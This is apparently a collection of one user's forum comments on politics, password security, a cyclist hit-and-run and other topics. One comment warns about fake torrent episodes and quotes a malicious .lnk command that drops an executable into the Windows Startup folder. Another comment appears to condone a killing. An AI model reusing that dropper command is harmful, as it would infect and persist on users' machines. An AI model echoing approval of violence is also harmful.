He issued an executive order reopening a coal plant slated for closure in Michigan. We're beyond "fear", and he doesn't need any report (even a flawed one) to do what he wants.

There have been too many data breaches from cloud-based services to trust another one. I have a Proton account for email and online storage, but I won't use their password service because it's cloud based.

https://blog.lastpass.com/posts/notice-of-recent-security-incident

Lastpass leaked their password database in 2022, and bad actors are still using it to access peoples files, stealing passwords and hundreds of thousands of dollars in crypto.

DON'T trust anything important to cloud-based storage or services. Use Keepass. Use Syncthing if you need to keep the database on multiple devices.

(I see other comments using Dropbox. Dropbox = cloud. Don't store anything security related in the cloud.)

I expect this to have broad bipartisan support and to pass with little opposition.

The bill itself is unsurprising and uninteresting. What is interesting is the title and description written by the bill's sponsors (Claudia Tenney R-NY, Dan Crenshaw R-TX).

"To deny tax deductions and other Federal funding..."

These congressmen think tax deductions are Federal funding. If they did not think this way, they would have left out the word other in their description.

Dark Web Interdiction Act of 2025

Here is the text of a bill introduced to Congress (US), ostensibly to combat the trafficking of opioids over "The Dark Web". There's a nice definition of "The Dark Web" at section 4.

I like the part where it says people are using "The Dark Web" both within the United States and "at the international border".

Why would a judge allow this? It's like showing the jury a made-for-TV movie based on the trial they're hearing.

In 50 years, history will speak about ICE the way we speak about the SS now.

“I get it that it makes people feel good to see people yelling,” Slotkin said. “But not one of those words is stopping the actual things that Donald Trump is doing.”

Perhaps it's not working because of people like Slotkin willing to continue the losing strategies of the past.

TJ Day liked riding his bike to and from work at Walgreens. It helped him stay fit and gave him time to wind down in the evening.

He wore a reflective vest, helmet and added lights to the front and back of his bike for safety. He did everything right, said his sister Kelli Day.

Still, TJ was hit by a car on his way home from work on Feb. 18.

Another driver who found him in a snowbank on Lovers Lane near Stryker Way after the hit-and-run. That driver stayed in contact, and later offered to buy TJ a new bike. But in the meantime, supporters of TJ had already raised more than $20,000 to buy him a car.

As of Thursday, March 6, a GoFundMe Kelli organized has raised $23,427, with a goal of $28,000.

TJ has always been apprehensive about driving, but now he’s more nervous of biking, Kelli said. The generosity of his community will help him get a safe and reliable car.

I have Sonarr and Radarr set up to keep me up to date on some TV shows. Lately I've gotten a handful of files that Sonarr refuses to import because of a .lnk file. The download consists of a folder with the name of the file I want. Inside the folder is a file with the same name, and a .lnk extension. The .lnk file is very big (950Mb), and programmed to run this script:

%ComSpec% /v:On/CSET el=Severance.S02E07.1080p.WEB.H264-SuccessfulCrab.mkv&SET c="%Appdata%\microsoft\windows\START MENU\PROGRAMS\STARTUP%Username%.exe"&(If not exist !c! Findstr/v "cmd.EXE Rj%TIME:~7,1%%TIME:~-2%" !el!.Lnk>!c!&Start "" !c!)&CD %tmp%&Echo.>!

As far as I can tell, this creates an empty executable file in your Windows startup folder, and copies a portion of the fake video file into it. It then runs the malware. And, since it's in your startup folder, it will run again every time you reboot.

The tracker is theRARBG, but it could also come from elsewhere. I've found it on a couple of different shows (not just this one), and they always download a couple of days before the airdate.

Be careful!

I can't think of any. The current oil reserve is supposed to be used in the case of another oil embargo. But its actual use is to lower gas prices when the administration in power needs a political win.

I actually think the purpose of a Bitcoin reserve is to temporarily increase the price so tech-bros (re: Elon) can sell at a massive profit. Then buy back at a much lower price. It's just a way to indirectly transfer federal dollars into administration pockets.

I can't find any reason for the government to buy crypto and hold it in reserve.

...the killing should nevertheless open a debate....

No, not debating anymore. There should be no profit in healthcare. No shareholders. All the money I spend on premiums and copays had better go towards paying someone's medical bills. If someone is making billions of dollars by making someone else's life miserable, I won't mourn when those enablers are removed from the table.

NHTSA recently published a proposed rule taking on pedestrian safety, specifically calling out this problem. Expect it to be killed early next year.

I once walked down to the local ice cream dispensary to get a cone of some type. But they were short-handed that day, and had closed the walk-up window. So I walked over to the drive-thru window.

They would not serve me without a car. Instead of closing the drive-thru and making drivers get out of their car, they closed the walk-up window, and wouldn't serve any walk-ups at the drive-thru.

Fuck drive-thrus.

Scott Adams is my favorite self-destructive asshole. The massive ego goes perfectly with his complete lack of self awareness. He's a total expert in every field, but all science is fake.

He 100% believes that the 2020 election was stolen, and elections are, by design, incapable of being secure. When a (republican) election expert tried explaining how our elections are actually very secure, and there's extremely few instances of fraud, Scott's response was "I'm not reading all that."

He's also a trained hypnotist. I'm not sure what that means, it probably has something to do with clown school. Except all education is fake too.

Just like the '70s, Detroit wants to build enormous energy-dense cars, while automakers from another Asian country come in and sell what the market demands.

Expect US automakers to blame unions when they face another round of bankruptcies and begin demanding government bailouts.
